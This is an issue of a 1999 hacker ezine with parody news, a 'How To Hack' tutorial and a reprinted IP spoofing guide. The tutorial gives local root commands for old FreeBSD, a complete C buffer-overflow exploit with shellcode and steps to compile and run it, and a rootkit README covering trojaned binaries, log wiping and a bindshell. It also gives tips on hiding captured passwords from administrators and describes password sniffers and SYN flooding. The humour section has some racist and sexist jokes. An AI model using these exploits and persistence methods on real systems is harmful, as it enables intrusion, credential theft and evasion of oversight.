www.2600.com www.fre * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ It isn't by mere chance that "anal" is part of the word "analyst" - Anonymous (Ex?)Analyst "Its like my yo-yo, what made it special made it dangerous, so I buried it ..." - Kate Bush (Cloudbusting) Seen on Doonesbury (as reported by HNN and Innerpulse.com) script included below for completeness .... <:-p Dad - "I Can't understand how anyone could break into our server we just installed a new firewall!" Girl - "Its easy Pop, anybody can hack these days, even newbies can just pull kiddie scripts off the web and put an exploit into play within seconds Theres just no degree of difficulty anymore, half my computer class has hacked into the Strategic Air Command." Dad - "They WHAT!" Girl - "To collect old launch codes. Its no big deal." I still don't think Doonesbury is, was or ever will be, funny but to each their own... - Ed More humour from www.innerpulse.com; SNET Consumer Tip Hotline Contributed by siko Tuesday - March 23, 1999. 05:36PM GMT SNET Consumer Tip Hotline helps people with their everyday struggles. Innerpulse President, siko, provides the inf0z for the heads up in the scene. 1-800-999-8477 2351 Portable Computers. 2352 Avoiding Viruses. 2354 It's Broken! Innerpulse recommends 2352, Avoiding Viruses. It gives keen insight into the dark world of computer viruses created by shady criminals on the fringe of the web. AntiOnline Saga Continues Contributed by siko Tuesday - March 23, 1999. 04:33AM GMT Late last night, an expert panel of Innerpulse analysts reading through the new AntiOnline mail bag were able to make several key insights as to the organization and operation of AntiOnline. Dan Martin, who was obviously leaked some inside information from someone high up in the AntiOnline heirarchy, let the world know about the disasters over at AntiOnline. Not only is the lobby messy, but AntiOnline gets their news from what market experts are calling.. Innerpulse.com. "I used the investment money to support my cocaine habit", boasted JP just before he blasted Mexicans for being what he thinks as inferior to himself. Other sections of the Mail Bag included racist remarks aimed at Brazilians, Chinese, and Arabs (we can only assume he was knocking Arabs with the bombing cracks). "This is an outrage. How could he tear up so many different different people. And worst of all he forgot to tear up the Japanese.", said a respected member of the Internet community. Also, Innerpulse CEO, Marvin Speling, has decided to contact the resident Innerpulse Legal staff since it seems AntiOnline is what is legally termed as "Crampin my style". Innerpulse likes people of all race, creed, color, sex, age, and origin. Undernet patrons excluded. New Study Results: Only Idle on IRC Contributed by siko Sunday - March 21, 1999. 09:12PM GMT Innerpulse.com spent time on Efnet and Undernet and picked up a thing or two. Innerpulse has now learned that just because someone is idle for a week on IRC doesn't mean your news page should idle for a week, as Innerpulse Media Ltd. has concluded in a comprehensive study early this morning. "Sometimes I idle on IRC for 2, 3 days at a time. The idea of idling elsewhere on the Internet is new... ", commented an unknown Undernet IRC patron. "But I guess it could be kind of elite..". Among other areas explored by the small panel of hackers who tested internet waters for over a week as a supplement to Gateway's study included IRC relationships and an inside look at why hackers hack. Innerpulse head janitor, Bobo Jensen, commented on his IRC relationship and how it all fit in with his wildly successful life. Innerpulse Analyst, Mark Winters, speculated on the future of online relationships: "We all know bitches aint shit. What do you want me to say?" AOL's security compromised Contributed by blanco Sunday - March 21, 1999. 08:01PM UTC An 18-year-old high school dropout has been charged with computer tampering after hacking into the internal computers of America Online and altering some programs. The super k-rad hacker apparently exploited AOL's main server by "Punting" it, which apparently it's servers cannot handle. This AOL hacker did not return phone calls when Innerpulse contacted him for further information. AOL security expert Mark Winters made these comments, " It appears after we upgraded all of our servers to Windows98 last week that we didn't patch it to AOL standard. Fixing a punt attack like this one will cost us about $50,000. In reality that isn't too much, since we charge our customers $20.00 per m onth when they can barely use our service due to busy signals." USA today Flood Net has Local IRC'er's 'Shitting Bricks' Contributed by siko Tuesday - March 09, 1999. 09:17PM GMT It was a calm, placid seeming Tuesday afternoon on the Internet. Thats when what one channel member is calling 'an outbreak from hell' occured. "I looked away to see what was on TV, and next thing I know, they were filling our channel up. There were at least 20 of them", said one channel member. The hacker and his channel wish to remain nameless. "Next thing I know they were sending a msg to the channel saying 'owned!!!!!@@#$' all at the same time. It's a really creative idea, when you think about it.". What is known to expert IRC operators as a 'Flood Net', was at work flooding the hacker channel. Innerpulse IRC expert Mark Winters was contacted to help take some of the myth out of Flood Nets, to help the reader understand just how vicious these attacks can be. "Well, one of my fondest experiences was when I was talking to my bitch online, and all of a sudden a bunch of fuckers with the same nick with a different number appended to the end joined the channel and starting flooding. I had to do something quick.", says Winters, who has several other such experiences. "It wasn't for about.. say 3 months til I found a patch. It is to type '/msg '. This eliminates the possibility of outside interference.". The FloodNet that rocked this small Efnet IRC community earlier Tuesday afternoon has left. Analysts speculate that everything will be back to normal when the shock wears off. @HWA HOW.TO "How To Hack" March 1999 -> Part 2 (Step 5) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Intro from previous issue ~~~~~~~~~~~~~~~~~~~~~~~~~ This is not coincidentally next to the HA.HA section in the HWA.hax0r.news zine in fact the name itself is a piss-take on the "scene" (if you can't take the piss out of yourself you're taking things way to seriously and won't survive 2 weeks out here) but its a fact that anyone that puts out a zine like this has to deal with and thats the endless messages and questions from 'newbies' asking "HOW DO I HACK xxxx OS?" etc, well here's how you do it. I'll warn you up front that i'm not going to be gentle and will be fucking blunt with you, if you don't have the balls fuck off now you're dead meat and will be minced and made a laughing stock all over the net, if you think you can handle it then read on, this is an excersize that is best learned by doing but do it on your own machine if you try any of these things on someone elses box without any experience you will end up in jail. Step 5. ~~~~~~~ Breaking in. Actually this consists of scanning for weaknesses first before any real attempts are made at gaining entry. An adept admin or a savvy network operations centre (NOC) will have scanner alarms set up to identify possible threatening probes so this is another reason why u want to do this on a home machine, the purpose after all is to learn how to secure your own site by breaking into it as Dan Farmer pointed out in his paper, you have read that right? no? then read it now then continue here. Common insecurities ~~~~~~~~~~~~~~~~~~~ There are almost as many ways to compromise a system as there are programs that are available to run from shell. Almost every program ever written has some sort of weakness or fallibility the most common being the buffer overflow (read Smashing The Stack by Mudge) this works by "popping the stack" with alien code using a benign program such as sendmail to insert the code. Using sendmail has its obvious merits because it can be accessed from outside the system other entry points are rlogin, telnet, ftp, qpopper, among several others, your scanner will have identified open ports, some may surprise you, its amazing what people have running and often do not even realize for instance backdoors left over from previous attacks where the attacker is long gone and moved on to other systems. Back to our own system, i'll use BSD in this example, using and old copy of FreeBSD it was possible to gain root using a simple script and the mount union command, by using vi or simply echo data >> script it was possible (if you had a user account) to gain root priveledges in a matter of seconds regardless of your group or access level. to get a root shell as an unpriveledged user use: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to get euid try this: export PATH=/tmp:$PATH echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 This worked on BSD up to version 2.0 STABLE And here is an example of a mount exploit using the buffer overflow method; /* Mount Exploit for Linux/FreeBSD, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio Covin 1996 */ #include #include #include #include #include #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); } the above example requires that you have access to a compiler and that is not always the case in a restricted shell environment, to compile the above code copy it to mount.c and use gcc -o mountx mount.c then run ./mountx to initiate the compromise, you will be rewarded (in an unpatched system) with a root shell. Once you have root you want to keep it unless you are doing a hit and run or web server hack, for this you'll probably want to use what is known as a ROOTKIT. The rootkit is a package that contains various programs which have been patched (trojaned) to ensure that if your initial entry has been found you can regain access by one of the various methods included in the rootkit. Common trojaned programs include su (which will track all user logins by the super user (root user) and store or mail the logins and passwords to you either in a local file or email, it is safer to store the passwords in a local file which is hidden somewhere deep in the system than to email the password changes to an email account as you can be traced using the email method and it will show up in an IDS audit (IDS=Intrusion Detection Software) most large sites and secure sites will have some form of IDS running at regular intervals so you may have to reinstall or be creative in your deployment of the rootkit programs. create several copies of the programs on the system and use innocuous names such as ./safe_backup for your programs, a dumb sysadmin on a busy system may assume that these were left for root compromise eventualities by another sysadmin. Other trojaned files that are common in rootkits are obvious, telnet and ftp for instance, will also store or email logins and passwords. A good rootkit is available for most common unices and will usually also contain a sniffer program. Here is an example of the contents of a rootkit from a README for a freebsd rootkit available around the net (try Packetstorm) this was originally published in CRH (Confidence Remains High) an excellent HPA zine, look for it and read it,a very good source for info. Ok.. I found this rootkit out on an ftp site somewhere. Anyway, when I got it, there was a bunch of compile errors and it seemed to be for an older version of freebsd. So, I took a new source tree from my box and copied the trojan code from this rootkit into it.. So, this rootkit should work on FreeBSD 2.2.5-RELEASE. Ok.. I left out the following trojans and files: chpass Trojaned! User->r00t passwd Trojaned! User->r00t zapbsd2 An improved utmp/wtmp/lastlog type zapper tripwire Trojaned! Hide changes but I put in: marryv11.c good log cleaner.. i put a #define bsd in it Enjoy, humble - jmcdonal@unf.edu 1/15/98 Thanks to ducksquak, simpson and sygma for testing. The _____ ____ ____ ____ | ___| __ ___ ___| __ ) ___|| _ \ | |_ | '__/ _ \/ _ \ _ \___ \| | | | | _|| | | __/ __/ |_) |__) | |_| | |_| |_| \___|\___|____/____/|____/ rootkit 1.2 (1/27/97) by Method NOTE: This package was heavily influenced by the existing Linux rootkit, which in turn was adapted from the SunOS rootkit, etc., etc. UPDATES: 1.0.1 - Fixed some broken Makefile stuff. Made it so inetd does the right thing on a SIGHUP. Added some extra security to the shell trojans. 1.1 - Added tripwire trojan. Cleaned up some other stuff. 1.2 - Put a password on inetd (Thanks for the suggestion Whoot :) This package includes the following: chpass Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing netstat Trojaned! Hide connections passwd Trojaned! User->r00t ps Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs fix File fixer! addlen File length fixer(!) zapbsd2 An improved utmp/wtmp/lastlog type zapper bindshell port/shell type daemon! tripwire Trojaned! Hide changes sniffit A kewl sniffz0r! INSTALLATION: To install this kit execute the command 'make all install' from the # prompt. All of the file/password configurations are in config.h so feel free to modify things to suit your particular fancy. Everything here has been tested on a FreeBSD-stable distribution. See the note at the end about what to do if the admin uses tripwire. Also make sure to read the Makefile and scripts so you know what's going on. USAGE: OK I will go through how to use each program one by one. NOTE when I say password I mean the rootkit password not your users password (d0h!). By default the rootkit password is "h0tb0x". chpass - Local user->root. Run ch{sh,fn,pass} then when it asks you for a new name enter your password. inetd - Binds a shell to a port for remote access. Adds a shell exec service on the ingreslock port, type in the rootkit password to start a shell. login - Allows login to any account with the rootkit password. If root login is refused on your terminal login as "r00t". History logging is disabled if you login using your password. ls - Trojaned to hide specified files and directories. The default data file is /dev/ptyr. All files can be listed with 'ls -/'. The format of /dev/ptyr is: ptyr fbsdrootkit-1.0 pr0n Use partial filenames. This would hide any files/directories with the names ptyr, fbsdrootkit-1.0 and pr0n. du - (see ls) ifconfig - Modified to remove PROMISC flag on the ethernet device. netstat - Modified to remove tcp/udp/sockets from or to specified addresses, paths and ports. default data file: /dev/ptyq command 1: hide local address command 2: hide remote address command 3: hide local port command 4: hide remote port command 5: hide UNIX socket path example: 1 128.31 <- Hides all local connections from 128.31.X.X 2 128.31.39.20 <- Hides all remote connections to 128.31.39.20 3 8000 <- Hides all local connections from port 8000 4 6667 <- Hides all remote connections to port 6667 5 .term/socket <- Hides all UNIX sockets including the path .term/socket passwd - Local user->root. Enter your rootkit password instead of your old password. ps - Modified to remove specified processes. Default data file is /dev/ptyp. An example data file is as follows: 0 0 Strips all processes running under root 1 p0 Strips tty p0 2 sniffer Strips all programs with the name sniffer Don't put in the comments, obviously. rshd - Execute remote commands as root. Usage: rsh -l rootkitpassword host command i.e. rsh -l h0tb0x 0wn3d.escape.com /bin/sh -i would start a root shell. syslogd - Modified to remove specified strings from logging. I thought of this one when I was on a system which logged every connection.. I kept getting pissed off with editing files every time I connected to remove my hostname. Then I thought 'Hey dude, why not trojan syslogd?!' and the rest is history. :) Default data file is /dev/ptys Example data file: evil.com 123.100.101.202 rshd This would remove all logs containing the strings evil.com, 123.100.101.202 and rshd. Smart! :)) sniffit - An advanced network sniffer. This is pretty kewl and has lots of filtering options and other stuff. Useful for targetting a single host or net. Sniffit uses ncurses. bindshell - This is pretty self-explanatory. Basically it binds a shell to a port, 31337 by default. Read the source on this one. fix - Replaces and fixes timestamp/checksum infomation on files. I modified this a bit for my own uses and to fix a nasty bug when replacing syslogd and inetd. The replacement file will be erased by fix (unlike other versions). addlen - This quickie modifies the length of files by adding harmless zeros to the end. Wonder why nobody ever thought of doing this before. Inspired by a stupid security tool which checks lengths of setuid files. zapbsd2 - This improved version of zapbsd writes over entries with ones instead of zeros. I added some capabilities and error checking so I raised the number. TRIPWIRE: I have done a major improvement of this part. Simply make tripwire and the script will ask you a few questions and take action depending on your responses. If both the database file and tripwire binary are read-only then there is nothing you can do. SOURCES: Some of these patches are derived from the original SunOS rootkit. ls, du, ps, netstat and chpass were done by yours truly. Anything else came from the Linux rootkit with a few modifications. The idea for tripwire was my own. OTHER: I welcome all comments and questions at method@yikes.com. All complaints and flames will be sent to /dev/null. Thanks to OGhost and Phelix for beta testing and advice. In closing, this kit can only take you so far. Although it covers almost everything, a competent sysadmin will eventually catch on. Remember, never let your guard down. -M Packet Sniffing ~~~~~~~~~~~~~~~ Read the papers 'things that go bump on the net' and others of that ilk for a good idea what can happen to a compromised system that has had a sniffer installed. You can sniff kerberos tickets and setup irc interception filters to gain access to oper passwords and 'leet channels among other things by using a sniffer on a well placed system somewhere on the backbone. Use traceroute to determine where a likely target is located and start your scan from there. Here is an excerpt from HiR #8 on packet sniffing, which gives a good outline of the sniffing concept and includes some code, taken directly from the Hackers Information Report site and included here for complete ness. Please check out their site for further great information and a good news letter archive. Main site: http://axon.jccc.net/hir/ This excerpt: http://axon.jccc.net/hir/articles/hir8/hir8-9.txt HiR 8 -]]])))}}}>>> Packet Sniffing Techniques For The Novice User <<<{{{((([[[- by Axon Ahh, the wonderful world of packet sniffing. You may or may not have done this before... "Sniffing" is the process of putting your computer's network card into what's called "promiscuous mode". It will read all packets that it sees (whereas normally it only reads the packets that have its address on it). After the card is placed in this mode, a sniffer will track packets (usually parsing the useful data out of the packet and writing it to a log file onto the hard disk). This is a really good way of doing a few things on a network: o Gathering traffic information, looking for lan stations that are abusing bandwidth. o Actually looking at the data inside the packets to see what files people are downloading with FTP, watching telnet sessions, and even watching their usernames and passwords. o Getting a general Idea of where most of the packets are coming from and going to, as a troubleshooting measure. There are sniffing programs for almost every platform. My favorite platform is linux, as it is already my Operating System of choice, and there are quite a few really easy to use sniffers for it. These include: tcpdump, sniffit, iptraf, and linsniffer. Those are what I use the most. My favorite floppy-linux distribution, Trinux, comes with sniffit, iptraf, and linsniffer. Almost every "big" linux distro (Red Hat, Debian, Caldera, etc) comes with tcpdump, although you might have to select a special option to have it installed automatically. Tcpdump is probably the hardest of the three to learn how to use. It mostly dumps raw tcp packets out to standard output (or wherever you redirect it to). It has other options, too, but overall, it's difficult to use for the beginner. I'll focus more on the other two. Linsniffer is quite possiby the most evil of the sniffers I've mentioned. All it does is get passwords. It looks for http passwords, telnet passwords, ftp passwords, and mail passwords. It does a pretty good job, but really lacks an "ethical" use. You can get linsniffer (or any of these sniffers) wherever you can find linux software (places like sunsite, which is now metalab.unc.edu). All you do is run "linsniffer" as root. It will not display any output. Everything it finds will be placed in a file called "tcp.log" in the directory you were in when you started linsniffer. Sniffit is extremely cute. It's harder to find passwords with it, but if your goal has nothing to do with you finding passwords, and more to do with watching who is connected to what, and maybe even watching the actual connection, this is for you. With Sniffit, I have many times been successful in watching the exact telnet screen of people that are on my segment. You can redirect the sniffed output to another virual console, and that console becomes the telnet screen of the person whom you are sniffing. You see what they type, what they get back, you watch them read their e-mail with pine, as if their ghost was sitting there using your screen. Iptraf isn't really a "sniffer" by industry terms, but it still uses promiscuous mode to operate, Therefore I call it a "sniffer". Iptraf will break down the traffic stream into chunks for you, so you can see exactly what kind of packets are being exchanged, how big they are, and where they are coming from and going to. This proghram is not good for looking at the actual data inside the packet, but it's great for finding out who is hogging the bandwidth, and what they're hogging it with. As far as snifgfing on other platforms... For Windows 95 and 98 There is also a plugin for the ever-famous back-orifice program that does sniffing, called "Butt Sniffer". There is also a non-plugin version that just runs in an MS-Dos window under Windows 95/98. This is probably the best Windows 9x sniffer I've seen, and it's worth looking into. It's available through www.cultdeadcow.com under the backorifice page somewhere. Shoutouts to the author, Mudge (who kicked ass at DefCon) =] ------------------------------------------------------------------------------ So, if it's so easy to just watch what's going on on the local network, there must be loads of people doing it, right? Well, the paranoid would say so, but in actuality, there isn't probably a whole lot of it going on. I'm not saying that there isn't ANY. So if there's even the possibility that it's there, how would one stay protected from the evils of sniffing? Well, the apostols (a spanish hacking group, if memory serves correctly) has a few really good products. (One being QueSO, a remote tcp/ip fingerprinter for detecting what OS is being run on a remote machine), but the one we focus on here is "NEtwork Promiscuous Ethernet Detector" (or "neped"). It only runs on UNIX/Linux (that I know of. It's not directly compileable on windows, but I'm not much of a programmer. It might be easy to do). I Wrote a small shell script that uses neped as a core to take action when promiscuous mode is detected. sniffdetect.sh is configureable and can run a shell script or a program once as soon as sniffing is detected, and will run another program or script as soon as it sees the sniffing has stopped. It can be used to stop services on your system, e-mail an administrator, page someone, or even to shut down the machine (although I don't know why you would want to do such a thing). I set it up to blast the IP and MAC address of the sniffing machine to my pager, and to tell me that sniffing has ceased when it stops detecting the runnuing sniffers (I wrote some paging software that sends out alpha pages to me from the command line to do this). In theory, It's very possible to make something that will launch a counter-attack/Denial of Service against the sniffing machine, but I'm not really a believer in that method. Here's my shell script. sniffdetect.sh: -------------begin------------------------------------------------------- #!/bin/sh ## Cheap-ass promiscuous mode watcher/action-taker ## Written by axon ## ## Requires "NEtwork Promiscuous Ethernet Detector" (neped.c) ## ftp://apostols.org/AposTools/snapshots/neped/neped.c ## ## This program must be run as root, or neped must be set-uid root. ## ######################################################################### ## ## Config Options! ## ###### # Command or shell script that's run when promisc. promisccmd="promisc.sh" # mode card is found. This might shut down a # service, or e-mail an administrator. Up to you. # (you must write a promisc.sh script or change # this variable) # Command or shell script that's run when nopromisccmd="nopromisc.sh" # promisc. mode ceases. This might page # an administrator or restart a service. # (you must write a nopromisc.sh script or # change this variable) while true do while true do # Counts number of lines neped=`neped eth0 | wc -l` # that are returned # by neped. if [ $neped -gt 8 ];then # This runs the command of your $promisccmd # choice when promisc. mode break # is detected neped eth0|grep "*>" >> promisc.log # appends output of neped to promisc.log fi done while true do # Counts number of lines neped=`neped eth0 | wc -l` # that are returned # by neped. if [ $neped = 8 ];then # This runs the command of your $nopromisccmd # choice when promisc. mode break # ceases fi done done ----------------end sniffdetect.sh------------------------------------------ I hope that this gives you the edge that you need. This was in no way a very elaborate "sniffing how-to". You can go anywhere to get that sort of information. This was focused more on how it works, and what tools are used to do it, and how to protect yourself from the world of packet sniffers. More info from various sources, to be continued next issue ... Cruciphux P.S "Hacking IRC" is still in progress and will also be continued in a further issue of the zine its not forgotten or dead by any means. - Ed @HWA SITE.1 Featured.site.http://www.real-secure.org/ Ezine excerpt: IP Spoofing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I just stumbled acrosss this site while scanning the new affiliates list on HNN, its quite good, interesting layout, interesting information and a little different from the norm...well worth checking out here is a excerpt from their ezine on IP spoofing, since this ties in nicely with the "HOW.TO" section i've included the entire section on IP Spoofing from the zine for a taste of what to expect. Check out the site for more info. -=[ A short overview of IP spoofing: PART I ]=- -=[ Part of 'The Packet Project']=- (Includes Source for Linux 1.3.X and later kernels) All text and Source code written by Brecht Claerhout (Copyright 1996) All source tested on Linux kernel 2.0.X All packet data captured with Sniffit 0.3.2 (a pre-release at that time) ------------------------------------------------------------------------------- PART I: Simple spoofing (Non blind) ----------------------------------- 0. Introduction 0.1 What 0.2 For whom 0.3 Disclaimer 0.4 Licence 1. Short explanation of some words 2. Description of sourcecode 2.1 Source included 2.2 Programmer notes 3. TCP/IP (UDP) in an hazelnutshell 4. Non-blind spoofing 4.1 Know what you are doing 4.2 SYN flooding 4.3 Connection Killing 4.3.1 Using reset (RST) 4.3.2 Closing a connection (FIN) 4.3.3 Improving 4.4 Connection Hijacking 4.5 Other 5. The source code ------------------------------------------------------------------------------- PART I: Simple spoofing (Non blind) ------------------------------------------------------------------------------ 0. Introduction --------------- 0.1 What -------- This document describes some IP spoofing attacks and gives you example source code of the programs used for these attacks (and packet sniffer logs, so you see what exactly happens). It also provides you with an easy to use include file for experimenting a little yourself. Oh, if you make something nice with the "spoofit.h" file, please mail it to me (or a reference where it is available) with a little explanation on what it is (a few lines are enough)... If you have interesting remarks, comment, idea's, ... please contact me Brecht Claerhout PoBox 144 9000 Gent 12 Belgium If YOU think of yourself, you are "3>/dev/null or >/dev/echo depends on how smart you are. It is not wise to use what you don't know/understand, so read this before trying anything... it will only take a few minutes, and probably save you some hours of failure... This code is not crippled in the usual way (removing some vital parts), the power is limited by it's briefness, because I wanted to keep everything simple and illustrative (but working). It's a simple job to improve it, and that is the goal of this doc, that you improve it yourself. Thanks too Wim Vandeputte for spellchecking, and putting up with my constant nagging about IP during the writing of this sh!t... 0.2 For whom ------------ For people with an elementary knowledge of TCP/IP, some knowledge on C (only the basic setup) and some general UNIX knowledge. It's no use reading this document if you are completely unaware of these things, but mind you, only a little knowledge is enough. 0.3 Disclaimer -------------- I am in no way responsible for the use of this code. By using this software and reading this document you accept the fact that any damage (emotional, physical, dataloss and the end of the world as we know it ...) caused by the use or storage of these programs/documents is not MY responsability. I state that during the writing and testing of this document/source, I never violated any law. All spoofing was done between machines where I had legit root access, or where I had the permission from the legit root. This code can be written by any competent programmer, so this source is not so harmfull as some will say (cauz' I'm sure some people won't like this degree of disclosure). 0.4 Licence ----------- All source code and text is freely available. You can spread it, as long as you don't charge for it (exceptions are a small reproduction fee, if it isn't spread together with commercial software, texts.) You may not spread parts of the document, it should be spread as one package. You may not modify the text and/or source code. You can use the spoofit.h or derived code in your own programs as long as they are not commercial (i.e. FREE), and you give me the credits for it. 1. Short explanation of some words ---------------------------------- This is a short explanation of some words you might see in the text/source. You probably know all this, but I put it in here anyway. Sniffit My favourite Packet Sniffer, all sniffed sequences in this document where created with it. Sniffit can be obtained from: http://reptile.rug.ac.be/~coder/sniffit/sniffit.html Off course any other decent sniffer will do (but this one wears my personal marks and approval). (At time of writing a pre-release 0.3.2) IP-spoofing (further referenced to as spoofing) The forging of IP packets NOTE that not only IP based protocols are spoofed. NOTE that spoofing is also used on a constructive base (LAN spoofing, not discussed here). NOTE that I don't use it on a constructive base ;) Non-blind spoofing Using the spoofing to interfer with a connection that sends packets along your subnet (so generally one of the 2 hosts involved is located on your subnet, or all data traffic has to be passing your network device,... you might consider taking a job at some transatlantic route provider). Blind spoofing Using the spoofing to interfer with a connection (or creating one), that does not send packets along your cable. 2. Description of sourcecode ---------------------------- 2.1 Source included ------------------- spoofit.h The include file that provides some easy to use spoofing functions. To understand the include file and it's functions, read the header of that file for use of the C functions. *.c Example programs (on the use of spoofit.h) that are discussed in this document. Details on these programs are included in the appropriate sections. sniper-rst.c Basic TCP connection killer. (denial-of-services) sniper-fin.c Basic TCP connection killer. (denial-of-services) hijack.c Simple automated telnet connection hijacker. 2.2 Programmer notes -------------------- These programs are just examples. That means, they could be improved a lot. Because I wanted to keep them short and leave some stuff to your imagination, they are very simple. However they all work and are a good starting point. 3. TCP/IP (UDP) in an hazelnutshell ----------------------------------- Because it has been explained enough in 'Phrack Volume Seven, Issue Forty-Eight, File 14 of 18' by daemon9/route/infinity , and there is a lot of documentation available on the subject I will only repeat some things very briefly. (Please read the phrack #48 file or any other document on the subject before reading this). A connection is fully defined with 4 parameters, a source host and port, and a destination host and port. When you make a connection, data is send in packets. Packets take care of low level trafic, and make sure the data arrives (sometimes with special error handling). The spine of most networks is the IP protocol version 4. It is totally independent of all hardware protocols. TCP and UDP are higher level protocols wrapped up in IP packets. All those packets consist of a header and data. IP header contains (amongst other things): IP of source and destination hosts for that packet, and the protocol type of the packet wrapped up in it. (TCP=6, UDP=17, etc.). UDP packets contain (amongst other things): port number of source and destination host. UDP has no such thing as SEQ/ACK, it is a very weak protocol. TCP packets contain (amongst other things): port number of source and destination host, sequence and acknowledge numbers (further refered to as SEQ/ACK), and a bunch of flags. SEQ number: is counted byte per byte, and gives you the number of the NEXT byte to be send, or that is send in this packet. ACK number: is the SEQ number that is expected from the other host. SEQ numbers are chosen at connection initiation. I said is was going to be short... If you didn't understand the above text, read up on it first, because you won't understand sh!t of the rest. 4. Non-blind spoofing --------------------- 4.1 Know what you are doing --------------------------- The concept of non-blind spoofing (NBS further in this doc) is pretty simple. Because packets travel within your reach, you can get the current sequence and acknowledge (SEQ/ACK further in this doc) numbers on the connection. NBS is thus a very easy and accurate method of attack, but limited to connections going over your subnet. In spoofing documentation these attacks are sometimes ommited, because they are mostly 'denial-of-service' attacks, or because people don't realise the advantage a spoof (in particulary a hijack) can have above simple password sniffing. Spoofing in generally is refered to as a verry high level of attack. This refers to blind spoofing (BlS further in this doc), because NBS is kidstuff for a competent coder. 4.2 SYN flooding ---------------- Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of 18'. I won't waste much time on it. Setup: host A <-----][----------X--------------->host B | host S <-----------------/ Concept: Host S impersonates SYN (connection init) coming from host A, to host B. Host A should be unreachable (e.g. turned off, non existant,...). B sends out the second packet of the 3 way TCP handshake. Host B will now wait for response of host A. If host A is reachable it will tell host B (with a reset: RST) that it DID NOT inititate a connection, and thus host B received a bogus packet. (In that case host B will ingnore the SYN, and *normally* nothing will happen) So if A is unreachable, B will wait for response some time. When doing multiple attacks, the backlog of host B is going to be exceeded and host B will not except new connections (read on TCP bugs for additional features ;) for some time. 4.3 Connection Killing ---------------------- Setup: host A <------X------------------------->host B | A,B have a TCP connection running host S <------/ A,S on same subnet (setup is the same in both cases) Use: Clearing mudders of your net, annoying that dude typing an important paper, etc... plain fun. 4.3.1 Using reset (RST) ----------------------- Concept: TCP packets have flags which indicate the status of the packet, like RST. That is a flag used to reset a connection. To be accepted, only the sequence number has to be correct (there is no ACK in a RST packet). So we are going to wait for packets in a connection between A and B. Assume we wait for packets to A. We will calculate (from B's packets) the sequence number for A's packets (from B's ACK's), and fire a bogus RST packet from S (faking to be A) to B. An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) host A : 166.66.66.1 host B : 111.11.11.11 